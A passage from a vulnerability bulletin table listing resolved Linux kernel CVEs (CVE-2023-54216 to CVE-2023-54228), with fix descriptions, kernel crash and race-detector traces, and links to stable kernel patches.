[mlx5_core] [ 826.454288] ? mlx5_eswitch_add_send_to_vport_meta_rule+0x260/0x260 [mlx5_core] [ 826.455011] ? mutex_unlock+0x80/0xd0 [ 826.455361] ? __mutex_unlock_slowpath.constprop.0+0x210/0x210 [ 826.455862] ? mapping_add+0x2cb/0x440 [mlx5_core] [ 826.456425] mlx5e_tc_action_miss_mapping_get+0x139/0x180 [mlx5_core] [ 826.457058] ? mlx5e_tc_update_skb_nic+0xb0/0xb0 [mlx5_core] [ 826.457636] ? __kasan_kmalloc+0x77/0x90 [ 826.458000] ? __kmalloc+0x57/0x120 [ 826.458336] mlx5_tc_ct_flow_offload+0x325/0xe40 [mlx5_core] [ 826.458916] ? ct_kernel_enter.constprop.0+0x48/0xa0 [ 826.459360] ? mlx5_tc_ct_parse_action+0xf0/0xf0 [mlx5_core] [ 826.459933] ? mlx5e_mod_hdr_attach+0x491/0x520 [mlx5_core] [ 826.460507] ? mlx5e_mod_hdr_get+0x12/0x20 [mlx5_core] [ 826.461046] ? mlx5e_tc_attach_mod_hdr+0x154/0x170 [mlx5_core] [ 826.461635] mlx5e_configure_flower+0x969/0x2110 [mlx5_core] [ 826.462217] ? _raw_spin_lock_bh+0x85/0xe0 [ 826.462597] ? __mlx5e_add_fdb_flow+0x750/0x750 [mlx5_core] [ 826.463163] ? kasan_save_stack+0x2e/0x40 [ 826.463534] ? down_read+0x115/0x1b0 [ 826.463878] ? down_write_killable+0x110/0x110 [ 826.464288] ? tc_setup_action.part.0+0x9f/0x3b0 [ 826.464701] ? mlx5e_is_uplink_rep+0x4c/0x90 [mlx5_core] [ 826.465253] ? mlx5e_tc_reoffload_flows_work+0x130/0x130 [mlx5_core] [ 826.465878] tc_setup_cb_add+0x112/0x250 [ 826.466247] fl_hw_replace_filter+0x230/0x310 [cls_flower] [ 826.466724] ? fl_hw_destroy_filter+0x1a0/0x1a0 [cls_flower] [ 826.467212] fl_change+0x14e1/0x2030 [cls_flower] [ 826.467636] ? sock_def_readable+0x89/0x120 [ 826.468019] ? fl_tmplt_create+0x2d0/0x2d0 [cls_flower] [ 826.468509] ? kasan_unpoison+0x23/0x50 [ 826.468873] ? get_random_u16+0x180/0x180 [ 826.469244] ? __radix_tree_lookup+0x2b/0x130 [ 826.469640] ? fl_get+0x7b/0x140 [cls_flower] [ 826.470042] ? fl_mask_put+0x200/0x200 [cls_flower] [ 826.470478] ? __mutex_unlock_slowpath.constprop.0+0x210/0x210 [ 826.470973] ? fl_tmplt_create+0x2d0/0x2d0 [cls_flower] [ 826.471427] tc_new_tfilter+0x644/0x1050 [ 826.471795] ? tc_get_tfilter+0x860/0x860 [ 826.472170] ? __thaw_task+0x130/0x130 [ 826.472525] ? arch_stack_walk+0x98/0xf0 [ 826.472892] ? cap_capable+0x9f/0xd0 [ 826.473235] ? security_capable+0x47/0x60 [ 826.473608] rtnetlink_rcv_msg+0x1d5/0x550 [ 826.473985] ? rtnl_calcit.isra.0+0x1f0/0x1f0 [ 826.474383] ? __stack_depot_save+0x35/0x4c0 [ 826.474779] ? kasan_save_stack+0x2e/0x40 [ 826.475149] ? kasan_save_stack+0x1e/0x40 [ 826.475518] ? __kasan_record_aux_stack+0x9f/0xb0 [ 826.475939] ? task_work_add+0x77/0x1c0 [ 826.476305] netlink_rcv_skb+0xe0/0x210 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54216 | https://git.kernel.org/stable/c/4150441c010dec36abc389828e2e4758bd8ad4b3 https://git.kernel.org/stable/c/dfa1e46d6093831b9d49f0f350227a1d13644a2f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "drm/msm: Add missing check and destroy for alloc_ordered_workqueue" This reverts commit 643b7d0869cc7f1f7a5ac7ca6bd25d88f54e31d0. A recent patch tried to fix up the msm_drm_init() paths with respect to the workqueue but only ended up making things worse: First, the newly added calls to msm_drm_uninit() on early errors would trigger NULL-pointer dereferences, for example, because the kms pointer would not have been initialised. (Note that these paths were also modified by a second broken error handling patch which in effect cancelled out this part when merged.) Second, the newly added allocation sanity check would still leak the previously allocated drm device. Instead of trying to salvage what was badly broken (and clearly not tested), let's revert the bad commit so that clean and backportable fixes can be added in its place. Patchwork: https://patchwork.freedesktop.org/patch/525107/ | 2025-12-30 | not yet calculated | CVE-2023-54217 | https://git.kernel.org/stable/c/9078b434587722a6f2958dc1d536af6e39634db9 https://git.kernel.org/stable/c/dfa70344d1b5f5ff08525a8c872c8dd5e82fc5d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: Fix load-tearing on sk->sk_stamp in sock_recv_cmsgs(). KCSAN found a data race in sock_recv_cmsgs() where the read access to sk->sk_stamp needs READ_ONCE(). BUG: KCSAN: data-race in packet_recvmsg / packet_recvmsg write (marked) to 0xffff88803c81f258 of 8 bytes by task 19171 on cpu 0: sock_write_timestamp include/net/sock.h:2670 [inline] sock_recv_cmsgs include/net/sock.h:2722 [inline] packet_recvmsg+0xb97/0xd00 net/packet/af_packet.c:3489 sock_recvmsg_nosec net/socket.c:1019 [inline] sock_recvmsg+0x11a/0x130 net/socket.c:1040 sock_read_iter+0x176/0x220 net/socket.c:1118 call_read_iter include/linux/fs.h:1845 [inline] new_sync_read fs/read_write.c:389 [inline] vfs_read+0x5e0/0x630 fs/read_write.c:470 ksys_read+0x163/0x1a0 fs/read_write.c:613 __do_sys_read fs/read_write.c:623 [inline] __se_sys_read fs/read_write.c:621 [inline] __x64_sys_read+0x41/0x50 fs/read_write.c:621 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc read to 0xffff88803c81f258 of 8 bytes by task 19183 on cpu 1: sock_recv_cmsgs include/net/sock.h:2721 [inline] packet_recvmsg+0xb64/0xd00 net/packet/af_packet.c:3489 sock_recvmsg_nosec net/socket.c:1019 [inline] sock_recvmsg+0x11a/0x130 net/socket.c:1040 sock_read_iter+0x176/0x220 net/socket.c:1118 call_read_iter include/linux/fs.h:1845 [inline] new_sync_read fs/read_write.c:389 [inline] vfs_read+0x5e0/0x630 fs/read_write.c:470 ksys_read+0x163/0x1a0 fs/read_write.c:613 __do_sys_read fs/read_write.c:623 [inline] __se_sys_read fs/read_write.c:621 [inline] __x64_sys_read+0x41/0x50 fs/read_write.c:621 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc value changed: 0xffffffffc4653600 -> 0x0000000000000000 Reported by Kernel Concurrency Sanitizer on: CPU: 1 PID: 19183 Comm: syz-executor.5 Not tainted 6.3.0-rc7-02330-gca6270c12e20 #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 | 2025-12-30 | not yet calculated | CVE-2023-54218 | https://git.kernel.org/stable/c/fd28692fa182d25e8d26bc1db506648839fde245 https://git.kernel.org/stable/c/564c3150ad357d571a0de7d8b644aa1f7e6e21b7 https://git.kernel.org/stable/c/d7343f8de019ebb55b2b6ef79b971f6ceb361a99 https://git.kernel.org/stable/c/d06f67b2b8dcd00d995c468428b6bccebc5762d8 https://git.kernel.org/stable/c/de260d1e02cde39d317066835ee6e5234fc9f5a8 https://git.kernel.org/stable/c/7145f2309d649ad6273b9f66448321b9b4c523c8 https://git.kernel.org/stable/c/8319220054e5ea5f506d8d4c4b5e234f668ffc3b https://git.kernel.org/stable/c/dfd9248c071a3710c24365897459538551cb7167 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "IB/isert: Fix incorrect release of isert connection" Commit: 699826f4e30a ("IB/isert: Fix incorrect release of isert connection") is causing problems on OPA when DEVICE_REMOVAL is happening. ------------[ cut here ]------------ WARNING: CPU: 52 PID: 2117247 at drivers/infiniband/core/cq.c:359 ib_cq_pool_cleanup+0xac/0xb0 [ib_core] Modules linked in: nfsd nfs_acl target_core_user uio tcm_fc libfc scsi_transport_fc tcm_loop target_core_pscsi target_core_iblock target_core_file rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs rfkill rpcrdma rdma_ucm ib_srpt sunrpc ib_isert iscsi_target_mod target_core_mod opa_vnic ib_iser libiscsi ib_umad scsi_transport_iscsi rdma_cm ib_ipoib iw_cm ib_cm hfi1(-) rdmavt ib_uverbs intel_rapl_msr intel_rapl_common sb_edac ib_core x86_pkg_temp_thermal intel_powerclamp coretemp i2c_i801 mxm_wmi rapl iTCO_wdt ipmi_si iTCO_vendor_support mei_me ipmi_devintf mei intel_cstate ioatdma intel_uncore i2c_smbus joydev pcspkr lpc_ich ipmi_msghandler acpi_power_meter acpi_pad xfs libcrc32c sr_mod sd_mod cdrom t10_pi sg crct10dif_pclmul crc32_pclmul crc32c_intel drm_kms_helper drm_shmem_helper ahci libahci ghash_clmulni_intel igb drm libata dca i2c_algo_bit wmi fuse CPU: 52 PID: 2117247 Comm: modprobe Not tainted 6.5.0-rc1+ #1 Hardware name: Intel Corporation S2600CWR/S2600CW, BIOS SE5C610.86B.01.01.0014.121820151719 12/18/2015 RIP: 0010:ib_cq_pool_cleanup+0xac/0xb0 [ib_core] Code: ff 48 8b 43 40 48 8d 7b 40 48 83 e8 40 4c 39 e7 75 b3 49 83 c4 10 4d 39 fc 75 94 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc <0f> 0b eb a1 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f RSP: 0018:ffffc10bea13fc80 EFLAGS: 00010206 RAX: 000000000000010c RBX: ffff9bf5c7e66c00 RCX: 000000008020001d RDX: 000000008020001e RSI: fffff175221f9900 RDI: ffff9bf5c7e67640 RBP: ffff9bf5c7e67600 R08: ffff9bf5c7e64400 R09: 000000008020001d R10: 0000000040000000 R11: 0000000000000000 R12: ffff9bee4b1e8a18 R13: dead000000000122 R14: dead000000000100 R15: ffff9bee4b1e8a38 FS: 00007ff1e6d38740(0000) GS:ffff9bfd9fb00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005652044ecc68 CR3: 0000000889b5c005 CR4: 00000000001706e0 Call Trace: <TASK> ? __warn+0x80/0x130 ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core] ? report_bug+0x195/0x1a0 ? handle_bug+0x3c/0x70 ? exc_invalid_op+0x14/0x70 ? asm_exc_invalid_op+0x16/0x20 ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core] disable_device+0x9d/0x160 [ib_core] __ib_unregister_device+0x42/0xb0 [ib_core] ib_unregister_device+0x22/0x30 [ib_core] rvt_unregister_device+0x20/0x90 [rdmavt] hfi1_unregister_ib_device+0x16/0xf0 [hfi1] remove_one+0x55/0x1a0 [hfi1] pci_device_remove+0x36/0xa0 device_release_driver_internal+0x193/0x200 driver_detach+0x44/0x90 bus_remove_driver+0x69/0xf0 pci_unregister_driver+0x2a/0xb0 hfi1_mod_cleanup+0xc/0x3c [hfi1] __do_sys_delete_module.constprop.0+0x17a/0x2f0 ? exit_to_user_mode_prepare+0xc4/0xd0 ? syscall_trace_enter.constprop.0+0x126/0x1a0 do_syscall_64+0x5c/0x90 ? syscall_exit_to_user_mode+0x12/0x30 ? do_syscall_64+0x69/0x90 ? syscall_exit_work+0x103/0x130 ? syscall_exit_to_user_mode+0x12/0x30 ? do_syscall_64+0x69/0x90 ? exc_page_fault+0x65/0x150 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 RIP: 0033:0x7ff1e643f5ab Code: 73 01 c3 48 8b 0d 75 a8 1b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa b8 b0 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 45 a8 1b 00 f7 d8 64 89 01 48 RSP: 002b:00007ffec9103cc8 EFLAGS: 00000206 ORIG_RAX: 00000000000000b0 RAX: ffffffffffffffda RBX: 00005615267fdc50 RCX: 00007ff1e643f5ab RDX: 0000000000000000 RSI: 0000000000000800 RDI: 00005615267fdcb8 RBP: 00005615267fdc50 R08: 0000000000000000 R09: 0000000000000000 R10: 00007ff1e659eac0 R11: 0000000000000206 R12: 00005615267fdcb8 R13: 00000000000 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54219 | https://git.kernel.org/stable/c/77e90bd53019d4d4c9e25552b5efb06dfd8c3c82 https://git.kernel.org/stable/c/a277b736309f923d9baff0ef166d694d348a5b96 https://git.kernel.org/stable/c/9b6296861a5a9d58aacd72c249a68b073c78bfb4 https://git.kernel.org/stable/c/aa950b9835f2d004b071fd220459edd3cd0a3603 https://git.kernel.org/stable/c/1bb42aca7a9611c1991a790834e2a65f3345c5e8 https://git.kernel.org/stable/c/3f39698e7e842abc9bd2bd97bf5eeda4543db758 https://git.kernel.org/stable/c/4082b59705ee9e3912eaa9e15abda8e76039b681 https://git.kernel.org/stable/c/a3189341e2f609d48f730b18c8bbbf6783233477 https://git.kernel.org/stable/c/dfe261107c080709459c32695847eec96238852b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: 8250: Fix oops for port->pm on uart_change_pm() Unloading a hardware specific 8250 driver can produce the error "Unable to handle kernel paging request at virtual address" about ten seconds after unloading the driver. This happens on uart_hangup() calling uart_change_pm(). Turns out commit 04e82793f068 ("serial: 8250: Reinit port->pm on port specific driver unbind") was only a partial fix. If the hardware specific driver has initialized the port->pm function, we need to clear port->pm too. Just reinitializing port->ops does not do this. Otherwise serial8250_pm() will call port->pm() instead of serial8250_do_pm(). | 2025-12-30 | not yet calculated | CVE-2023-54220 | https://git.kernel.org/stable/c/66f3e55960698c874b0598277913b478ecd29573 https://git.kernel.org/stable/c/720a297b334e85d34099e83d1f375b92c3efedd6 https://git.kernel.org/stable/c/b653289ca6460a6552c8590b75dfa84a0140a46b https://git.kernel.org/stable/c/bd70d0b28010d560a8be96b44fea86fe2ba016ae https://git.kernel.org/stable/c/18e27df4f2b4e257c317ba8076f31a888f6cc64b https://git.kernel.org/stable/c/0c05493341d6f2097f75f0a5dbb7b53a9e8c5f6c https://git.kernel.org/stable/c/375806616f8c772c33d40e112530887b37c1a816 https://git.kernel.org/stable/c/dfe2aeb226fd5e19b0ee795f4f6ed8bc494c1534 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: imx93: fix memory leak and missing unwind goto in imx93_clocks_probe In function probe(), it returns directly without unregistering hws when an error occurs. Fix this by adding 'goto unregister_hws;' on line 295 and line 310. Use devm_kzalloc() instead of kzalloc() to automatically free the memory using devm_kfree() when an error occurs. Replace of_iomap() with devm_of_iomap() to automatically handle the unused ioremap region and delete 'iounmap(anatop_base);' in unregister_hws. | 2025-12-30 | not yet calculated | CVE-2023-54221 | https://git.kernel.org/stable/c/280a5ff665e12d1e0c54c20cedc9c5008aa686a5 https://git.kernel.org/stable/c/fac9c624138c4bc021d7a8ee3b974c9e10926d92 https://git.kernel.org/stable/c/d17c16a2b2a6589c45b0bfb1b9914da80b72d89e https://git.kernel.org/stable/c/e02ba11b457647050cb16e7cad16cec3c252fade |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hte: tegra-194: Fix off by one in tegra_hte_map_to_line_id() The "map_sz" is the number of elements in the "m" array so the > comparison needs to be changed to >= to prevent an out of bounds read. | 2025-12-30 | not yet calculated | CVE-2023-54222 | https://git.kernel.org/stable/c/fed87ce073c7b9f4f255105f90bd930df06d18a7 https://git.kernel.org/stable/c/aedc364a7c9cd2fb45b4f7c0a41c98365369ff46 https://git.kernel.org/stable/c/2a488602e3f09ef9e50feb5448ae46515a6fa789 https://git.kernel.org/stable/c/e078180d66848a6a890daf0a3ce28dc43cc66790 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: xsk: Fix invalid buffer access for legacy rq The below crash can be encountered when using xdpsock in rx mode for legacy rq: the buffer gets released in the XDP_REDIRECT path, and then once again in the driver. This fix sets the flag to avoid releasing on the driver side. XSK handling of buffers for legacy rq was relying on the caller to set the skip release flag. But the referenced fix started using fragment counts for pages instead of the skip flag. Crash log: general protection fault, probably for non-canonical address 0xffff8881217e3a: 0000 [#1] SMP CPU: 0 PID: 14 Comm: ksoftirqd/0 Not tainted 6.5.0-rc1+ #31 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:bpf_prog_03b13f331978c78c+0xf/0x28 Code: ... RSP: 0018:ffff88810082fc98 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888138404901 RCX: c0ffffc900027cbc RDX: ffffffffa000b514 RSI: 00ffff8881217e32 RDI: ffff888138404901 RBP: ffff88810082fc98 R08: 0000000000091100 R09: 0000000000000006 R10: 0000000000000800 R11: 0000000000000800 R12: ffffc9000027a000 R13: ffff8881217e2dc0 R14: ffff8881217e2910 R15: ffff8881217e2f00 FS: 0000000000000000(0000) GS:ffff88852c800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000564cb2e2cde0 CR3: 000000010e603004 CR4: 0000000000370eb0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? die_addr+0x32/0x80 ? exc_general_protection+0x192/0x390 ? asm_exc_general_protection+0x22/0x30 ? 0xffffffffa000b514 ? bpf_prog_03b13f331978c78c+0xf/0x28 mlx5e_xdp_handle+0x48/0x670 [mlx5_core] ? dev_gro_receive+0x3b5/0x6e0 mlx5e_xsk_skb_from_cqe_linear+0x6e/0x90 [mlx5_core] mlx5e_handle_rx_cqe+0x55/0x100 [mlx5_core] mlx5e_poll_rx_cq+0x87/0x6e0 [mlx5_core] mlx5e_napi_poll+0x45e/0x6b0 [mlx5_core] __napi_poll+0x25/0x1a0 net_rx_action+0x28a/0x300 __do_softirq+0xcd/0x279 ? sort_range+0x20/0x20 run_ksoftirqd+0x1a/0x20 smpboot_thread_fn+0xa2/0x130 kthread+0xc9/0xf0 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x1f/0x30 </TASK> Modules linked in: mlx5_ib mlx5_core rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm ib_uverbs ib_core xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat br_netfilter overlay zram zsmalloc fuse [last unloaded: mlx5_core] ---[ end trace 0000000000000000 ]--- | 2025-12-30 | not yet calculated | CVE-2023-54223 | https://git.kernel.org/stable/c/58a113a35846d9a5bd759beb332e551e28451f09 https://git.kernel.org/stable/c/e0f52298fee449fec37e3e3c32df60008b509b16 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix lockdep splat and potential deadlock after failure running delayed items When running delayed items we are holding a delayed node's mutex and then we will attempt to modify a subvolume btree to insert/update/delete the delayed items. However, if we have an error during the insertions for example, btrfs_insert_delayed_items() may return with a path that has locked extent buffers (a leaf at the very least), and then we attempt to release the delayed node at __btrfs_run_delayed_items(), which requires taking the delayed node's mutex, causing an ABBA type of deadlock. This was reported by syzbot and the lockdep splat is the following: WARNING: possible circular locking dependency detected 6.5.0-rc7-syzkaller-00024-g93f5de5f648d #0 Not tainted ------------------------------------------------------ syz-executor.2/13257 is trying to acquire lock: ffff88801835c0c0 (&delayed_node->mutex){+.+.}-{3:3}, at: __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256 but task is already holding lock: ffff88802a5ab8e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_lock+0x3c/0x2a0 fs/btrfs/locking.c:198 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #1 (btrfs-tree-00){++++}-{3:3}: __lock_release kernel/locking/lockdep.c:5475 [inline] lock_release+0x36f/0x9d0 kernel/locking/lockdep.c:5781 up_write+0x79/0x580 kernel/locking/rwsem.c:1625 btrfs_tree_unlock_rw fs/btrfs/locking.h:189 [inline] btrfs_unlock_up_safe+0x179/0x3b0 fs/btrfs/locking.c:239 search_leaf fs/btrfs/ctree.c:1986 [inline] btrfs_search_slot+0x2511/0x2f80 fs/btrfs/ctree.c:2230 btrfs_insert_empty_items+0x9c/0x180 fs/btrfs/ctree.c:4376 btrfs_insert_delayed_item fs/btrfs/delayed-inode.c:746 [inline] btrfs_insert_delayed_items fs/btrfs/delayed-inode.c:824 [inline] __btrfs_commit_inode_delayed_items+0xd24/0x2410 fs/btrfs/delayed-inode.c:1111 __btrfs_run_delayed_items+0x1db/0x430 fs/btrfs/delayed-inode.c:1153 flush_space+0x269/0xe70 fs/btrfs/space-info.c:723 btrfs_async_reclaim_metadata_space+0x106/0x350 fs/btrfs/space-info.c:1078 process_one_work+0x92c/0x12c0 kernel/workqueue.c:2600 worker_thread+0xa63/0x1210 kernel/workqueue.c:2751 kthread+0x2b8/0x350 kernel/kthread.c:389 ret_from_fork+0x2e/0x60 arch/x86/kernel/process.c:145 ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304 -> #0 (&delayed_node->mutex){+.+.}-{3:3}: check_prev_add kernel/locking/lockdep.c:3142 [inline] check_prevs_add kernel/locking/lockdep.c:3261 [inline] validate_chain kernel/locking/lockdep.c:3876 [inline] __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144 lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761 __mutex_lock_common+0x1d8/0x2530 kernel/locking/mutex.c:603 __mutex_lock kernel/locking/mutex.c:747 [inline] mutex_lock_nested+0x1b/0x20 kernel/locking/mutex.c:799 __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256 btrfs_release_delayed_node fs/btrfs/delayed-inode.c:281 [inline] __btrfs_run_delayed_items+0x2b5/0x430 fs/btrfs/delayed-inode.c:1156 btrfs_commit_transaction+0x859/0x2ff0 fs/btrfs/transaction.c:2276 btrfs_sync_file+0xf56/0x1330 fs/btrfs/file.c:1988 vfs_fsync_range fs/sync.c:188 [inline] vfs_fsync fs/sync.c:202 [inline] do_fsync fs/sync.c:212 [inline] __do_sys_fsync fs/sync.c:220 [inline] __se_sys_fsync fs/sync.c:218 [inline] __x64_sys_fsync+0x196/0x1e0 fs/sync.c:218 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd other info that ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54224 | https://git.kernel.org/stable/c/779c3cf2749c7a7bad6f839cb2954a25ba92f4d6 https://git.kernel.org/stable/c/32247b9526bfdaeef85f7339d9b4f913c7370f92 https://git.kernel.org/stable/c/36d918da3f1bf749178c7daf471a3be1730ed3ca https://git.kernel.org/stable/c/e110f8911ddb93e6f55da14ccbbe705397b30d0b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipa: only reset hashed tables when supported Last year, the code that manages GSI channel transactions switched from using spinlock-protected linked lists to using indexes into the ring buffer used for a channel. Recently, Google reported seeing transaction reference count underflows occasionally during shutdown. Doug Anderson found a way to reproduce the issue reliably, and bisected the issue to the commit that eliminated the linked lists and the lock. The root cause was ultimately determined to be related to unused transactions being committed as part of the modem shutdown cleanup activity. Unused transactions are not normally expected (except in error cases). The modem uses some ranges of IPA-resident memory, and whenever it shuts down we zero those ranges. In ipa_filter_reset_table() a transaction is allocated to zero modem filter table entries. If hashing is not supported, hashed table memory should not be zeroed. But currently nothing prevents that, and the result is an unused transaction. Something similar occurs when we zero routing table entries for the modem. By preventing any attempt to clear hashed tables when hashing is not supported, the reference count underflow is avoided in this case. Note that there likely remains an issue with properly freeing unused transactions (if they occur due to errors). This patch addresses only the underflows that Google originally reported. | 2025-12-30 | not yet calculated | CVE-2023-54225 | https://git.kernel.org/stable/c/50c24f0c940728792c8bdf65c1eaf6b91b3b0dcd https://git.kernel.org/stable/c/c00af3a818cc573e10100cc6770f0e47befa1fa4 https://git.kernel.org/stable/c/e11ec2b868af2b351c6c1e2e50eb711cc5423a10 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix data races around sk->sk_shutdown. KCSAN found a data race around sk->sk_shutdown where unix_release_sock() and unix_shutdown() update it under unix_state_lock(), OTOH unix_poll() and unix_dgram_poll() read it locklessly. We need to annotate the writes and reads with WRITE_ONCE() and READ_ONCE(). BUG: KCSAN: data-race in unix_poll / unix_release_sock write to 0xffff88800d0f8aec of 1 bytes by task 264 on cpu 0: unix_release_sock+0x75c/0x910 net/unix/af_unix.c:631 unix_release+0x59/0x80 net/unix/af_unix.c:1042 __sock_release+0x7d/0x170 net/socket.c:653 sock_close+0x19/0x30 net/socket.c:1397 __fput+0x179/0x5e0 fs/file_table.c:321 ____fput+0x15/0x20 fs/file_table.c:349 task_work_run+0x116/0x1a0 kernel/task_work.c:179 resume_user_mode_work include/linux/resume_user_mode.h:49 [inline] exit_to_user_mode_loop kernel/entry/common.c:171 [inline] exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204 __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline] syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297 do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86 entry_SYSCALL_64_after_hwframe+0x72/0xdc read to 0xffff88800d0f8aec of 1 bytes by task 222 on cpu 1: unix_poll+0xa3/0x2a0 net/unix/af_unix.c:3170 sock_poll+0xcf/0x2b0 net/socket.c:1385 vfs_poll include/linux/poll.h:88 [inline] ep_item_poll.isra.0+0x78/0xc0 fs/eventpoll.c:855 ep_send_events fs/eventpoll.c:1694 [inline] ep_poll fs/eventpoll.c:1823 [inline] do_epoll_wait+0x6c4/0xea0 fs/eventpoll.c:2258 __do_sys_epoll_wait fs/eventpoll.c:2270 [inline] __se_sys_epoll_wait fs/eventpoll.c:2265 [inline] __x64_sys_epoll_wait+0xcc/0x190 fs/eventpoll.c:2265 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc value changed: 0x00 -> 0x03 Reported by Kernel Concurrency Sanitizer on: CPU: 1 PID: 222 Comm: dbus-broker Not tainted 6.3.0-rc7-02330-gca6270c12e20 #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 | 2025-12-30 | not yet calculated | CVE-2023-54226 | https://git.kernel.org/stable/c/1c488f4e95b498c977fbeae784983eb4cf6085e8 https://git.kernel.org/stable/c/196528ad484443627779540697f4fb0ef0e01c52 https://git.kernel.org/stable/c/8307e372e7445ec7d3cd2ff107ce5078eaa02815 https://git.kernel.org/stable/c/a41559ae3681975f1ced815d8d4c983b6b938499 https://git.kernel.org/stable/c/e410895892f99700ce54347d42c8dbe962eea9f4 https://git.kernel.org/stable/c/f237f79b63c9242450e6869adcd2c10445859f28 https://git.kernel.org/stable/c/e1d09c2c2f5793474556b60f83900e088d0d366d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-mq: fix tags leak when shrink nr_hw_queues Although we don't need to realloc set->tags[] when shrinking nr_hw_queues, we need to free them. Otherwise these tags will be leaked. How to reproduce: 1. mount -t configfs configfs /mnt 2. modprobe null_blk nr_devices=0 submit_queues=8 3. mkdir /mnt/nullb/nullb0 4. echo 1 > /mnt/nullb/nullb0/power 5. echo 4 > /mnt/nullb/nullb0/submit_queues 6. rmdir /mnt/nullb/nullb0 In step 4, 9 tags will be allocated (8 submit queues and 1 poll queue), then in step 5, new_nr_hw_queues = 5 (4 submit queues and 1 poll queue). Finally, in step 6, only these 5 tags are freed; the other 4 tags are leaked. | 2025-12-30 | not yet calculated | CVE-2023-54227 | https://git.kernel.org/stable/c/c0ef7493e68b8896806a2f598fcffbaa97333405 https://git.kernel.org/stable/c/e1dd7bc93029024af5688253b0c05181d6e01f8e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: raa215300: Fix resource leak in case of error The clk_register_clkdev() allocates memory by calling vclkdev_alloc() and this memory is not freed in the error path. Similarly, resources allocated by clk_register_fixed_rate() are not freed in the error path. Fix these issues by using devm_clk_hw_register_fixed_rate() and devm_clk_hw_register_clkdev(). After this, the static variable clk is not needed. Replace it with local variable hw in probe() and drop calling clk_unregister_fixed_rate() from raa215300_rtc_unregister_device(). | 2025-12-30 | not yet calculated | CVE-2023-54228 | https://git.kernel.org/stable/c/2bf2d2ac9e67184dc99275875a6452ca6e3027ff https://git.kernel.org/stable/c/e21ac64e669e960688e79bf5babeed63132dac8a |
